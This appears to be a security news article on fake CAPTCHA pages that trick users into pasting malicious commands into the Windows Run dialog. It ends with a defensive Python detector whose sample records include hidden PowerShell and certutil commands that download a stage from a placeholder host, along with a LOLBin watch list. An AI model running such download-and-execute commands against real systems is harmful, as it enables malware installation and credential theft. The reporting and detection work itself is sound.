New variant of social engineering attack. Security experts have warned that the use of fake CAPTCHA pages to defraud victims has risen sharply over the past few months.
A recent analysis by the security firm ReliaQuest revealed that criminals are using fraudulent CAPTCHA pages imitating trusted services such as Google and Cloudflare to trick users into running malicious scripts on their own computers.
Although the campaign was first noticed in September, ReliaQuest noted that between October and early December 2024 the number of fake CAPTCHA websites seen by its clients almost doubled compared with the levels seen in September.
The firm suggested that this was likely the result of attackers sharing templates for the fake web pages with other cybercriminals.
“This spike is likely the result of researchers releasing the templates used for these campaigns, which inadvertently provided more attackers with the tools to easily repeat these tactics.”
The report highlights that advanced threat groups such as APT28 (Fancy Bear), associated with the Russian military, have used this technique, citing an investigation by Ukraine’s national cyber defense team into APT28’s use of fake CAPTCHA pages.
“A recent investigation by the Computer Emergency Response Team of Ukraine (CERT-UA) revealed that APT28 used fake CAPTCHA systems to infiltrate local authorities,” ReliaQuest added.
“By imitating reCAPTCHA interfaces, they tricked users into executing commands that downloaded malicious scripts. These scripts are capable of installing Secure Shell (SSH) tunnels and leaking data, highlighting the simplicity and effectiveness of the attack.”
The evolution of fake CAPTCHA attacks poses a ‘significant risk’
ReliaQuest described the attack chain used in these campaigns as “deceptively simple”: visitors to compromised websites are redirected to a fake CAPTCHA page.
But instead of the usual “click on the images with crosswalks” or retyping a distorted string of letters, the user is asked to open the Run dialog and paste a command that was silently copied to the clipboard when they visited the site.
Running this malicious command installs malware, usually a credential stealer such as Lumma Stealer.
Security researchers have dubbed this approach, in which victims run the malicious commands themselves, “Scam-Yourself” attacks.
Security vendor Gen Digital said it observed a significant increase in these types of attacks towards the end of 2024, recording a 614% quarter-on-quarter rise in the third quarter of 2024, and concluded that “social engineering and psychologically manipulative tactics continue to be one of the most dangerous tools in the cybercriminals’ arsenal.”
The report added that during the same period it protected more than 2 million users from the fake CAPTCHA variant of these “Scam-Yourself” attacks.
ReliaQuest warned that attackers will continue to refine their fake CAPTCHA attacks, making them harder to detect. The firm also predicts that the addition of alternative execution methods will pose a “significant risk” to organizations in the near future.
“Over the next three months, we expect improvements to the fake CAPTCHA infection vector, for example the use of alternative execution methods that do not rely on PowerShell commands,” the firm explained.
“This may involve using other LOLBins, such as forfiles.exe or certutil.exe, to load the initial stage in order to bypass existing detection measures.”
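As an added example (not from the article or from ReliaQuest), the following Python scores constructed process-creation records in a Sysmon-style shape for the chain described above: a LOLBin launched straight from explorer.exe, which is the parent when a command is pasted into the Run dialog, a remote URL on the command line, and a hidden window. The field names, the sample records and the LOLBin entries beyond powershell.exe, forfiles.exe and certutil.exe are assumptions.

```python
import re

# Constructed process-creation records modelled on Sysmon Event ID 1 fields.
# These are sample data for the example, not real telemetry.
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": 'powershell -w hidden -c "<pasted stage fetching http://example.invalid/v>"'},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\certutil.exe",
     "CommandLine": "certutil -urlcache -f http://example.invalid/s stage.txt"},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\forfiles.exe",
     "CommandLine": 'forfiles /c "cmd /c <placeholder>"'},
    {"ParentImage": r"C:\Program Files\Git\git-bash.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell -File build.ps1"},
]
# powershell.exe, forfiles.exe and certutil.exe are named in the report;
# the remaining entries are assumed additions for the same Run-dialog chain.
LOLBINS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe",
           "forfiles.exe", "certutil.exe"}
URL_RE = re.compile(r"https?://", re.I)
HIDDEN_RE = re.compile(r"-w(?:indowstyle)?\s+h", re.I)  # -w hidden / -WindowStyle Hidden

def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def score_event(ev: dict) -> tuple[int, list[str]]:
    """Count independent signals of a pasted Run-dialog command; returns (score, reasons)."""
    reasons = []
    # A command pasted into Win+R is launched by the shell, so explorer.exe is the parent.
    if basename(ev["ParentImage"]) == "explorer.exe" and basename(ev["Image"]) in LOLBINS:
        reasons.append("LOLBin spawned directly by explorer.exe")
    if URL_RE.search(ev["CommandLine"]):
        reasons.append("remote URL on the command line")
    if HIDDEN_RE.search(ev["CommandLine"]):
        reasons.append("hidden window requested")
    return len(reasons), reasons


def find_suspicious(events: list[dict], threshold: int = 2) -> list[tuple[str, list[str]]]:
    """Return (image name, reasons) for every event scoring at or above threshold."""
    hits = []
    for ev in events:
        score, reasons = score_event(ev)
        if score >= threshold:
            hits.append((basename(ev["Image"]), reasons))
    return hits
```

The forfiles record scores only one signal, so the parent-child relation alone is a weak indicator; it is worth correlating with the RunMRU registry key (HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU), where commands typed into the Run dialog are recorded.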